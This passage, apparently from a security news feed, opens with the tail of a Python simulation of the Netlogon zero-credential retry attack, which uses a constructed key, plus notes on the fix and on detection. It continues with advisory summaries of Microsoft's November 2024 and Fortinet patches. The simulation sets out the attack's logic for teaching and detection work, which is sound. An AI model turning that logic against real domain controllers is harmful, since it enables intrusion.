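    return cfb8_encrypt(key, ZERO_IV, ZERO_CHALLENGE) == bytes(8)


def session_key(attempt, seed=b"constructed-seed"):
    """Constructed stand-in for the per-attempt Netlogon session key. In the
    real protocol the server picks a fresh challenge every time, so the key
    changes on each attempt even though the account password does not."""
    return hashlib.sha256(seed + attempt.to_bytes(4, "big")).digest()[:BLOCK_SIZE]


def attempts_until_zero_credential(seed=b"constructed-seed", limit=10000):
    """Simulate the attacker's loop: send a zero challenge and a zero credential
    until the server derives a key that accepts them. Returns the attempt
    count, or -1 if the limit is reached."""
    for attempt in range(1, limit + 1):
        if credential_is_all_zero(session_key(attempt, seed)):
            return attempt
    return -1


def vulnerable_key_count(trials=4096, seed=b"constructed-seed"):
    """Count keys among `trials` that yield an all-zero credential; expect about trials / 256."""
    return sum(credential_is_all_zero(session_key(i, seed)) for i in range(trials))


if __name__ == "__main__":
    print("attempts needed:", attempts_until_zero_credential())
    print("vulnerable keys in 4096:", vulnerable_key_count())
```

Running the script prints how many attempts the simulated attacker needed and how many of 4,096 keys were vulnerable (around 16). The fix Microsoft shipped enforces secure RPC (signing and sealing) on Netlogon channels, which cannot be satisfied without the real session key; on the detection side, a burst of NetrServerReqChallenge and NetrServerAuthenticate3 calls from a single host against a domain controller is the signature of this retry loop.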

Microsoft Released its November 2024 Patch Tuesday for 91 Flaws Including 04 Zero-Days and 52 Remote Code Execution Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Denial of Service and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for November 2024, with security updates for 91 flaws, including four zero-days (two of them actively exploited) and 52 Remote Code Execution vulnerabilities. Successful exploitation of these vulnerabilities could result in Elevation of Privilege, Security Feature Bypass, Remote Code Execution, Information Disclosure, Denial of Service, and Spoofing.

Affected Products include .NET and Visual Studio, Airlift.microsoft.com, Azure CycleCloud, LightGBM, Microsoft Defender for Endpoint, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Office Excel, Microsoft Office Word, Microsoft PC Manager, Microsoft Virtual Hard Drive, Microsoft Windows DNS, Role: Windows Active Directory Certificate Services, Role: Windows Hyper-V, SQL Server, TorchGeo, Visual Studio, Visual Studio Code, Windows CSC Service, Windows Defender Application Control (WDAC), Windows DWM Core library, Windows Kerberos, Windows Kernel, Windows NT OS Kernel, Windows NTLM, Windows Package Library Manager, Windows Registry, Windows Secure Kernel Mode, Windows SMB, Windows SMBv3 Client/Server, Windows Task Scheduler, Windows Telephony Service, Windows Update Stack, Windows USB Video Driver, Windows VMSwitch, and Windows Win32 Kernel Subsystem.

Notable CVEs:

  • [Zero-Day] – [Important] – CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability – Discloses a user’s NTLMv2 hash to a remote attacker after only minimal interaction with a malicious file (selecting or inspecting it is enough; it need not be opened). The captured hash can then be relayed or cracked to authenticate as that user.
  • [Critical] – CVE-2024-43498 – .NET and Visual Studio Remote Code Execution Vulnerability – Exploitable by sending crafted requests to a vulnerable .NET web application, or by loading a specially crafted file into a vulnerable desktop application.
  • [Critical] – CVE-2024-43639 – Windows Kerberos Remote Code Execution Vulnerability – An unauthenticated attacker who sends crafted requests to an affected Kerberos component can execute arbitrary code on the system.

Recommendations:

Update all affected products to the latest available patch version.

Fortinet Patches Critical Vulnerabilities

Threat Reference: Global

Risks: Privilege Escalation, Arbitrary Code Execution and Unauthorized Session Hijacking

Advisory Type: Updates/Patches

Priority: Standard

Fortinet has released patches to address critical and high-severity vulnerabilities affecting its products. Successful exploitation of these vulnerabilities could result in Privilege Escalation, Arbitrary Code Execution, and Unauthorized Session Hijacking.

Affected products include FortiClientWindows, FortiAnalyzer, FortiAnalyzer-BigData, FortiManager, FortiManager Cloud, and FortiOS.

Notable CVEs:

  • [Critical] – CVE-2024-47575 – A missing authentication for a critical function in the FortiManager fgfmd daemon allows a remote, unauthenticated attacker to execute arbitrary code or commands through crafted requests. Fortinet has confirmed exploitation in the wild, so exposed FortiManager instances should be patched and reviewed for indicators of compromise, not only updated.
  • [High] – CVE-2024-36513 – A privilege context switching error in FortiClient for Windows may allow an authenticated user to escalate privileges via Lua auto-patch scripts.
  • [High] – CVE-2024-23666 – A client-side enforcement of server-side security vulnerability in FortiAnalyzer may allow an authenticated attacker with read-only access to carry out sensitive operations through crafted requests.

Recommendations:

Update all affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. The team researches emerging threats and tracks the activities of threat actors, ransomware groups, and campaigns, in order to stay ahead of potential risks. Beyond this investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.


]]>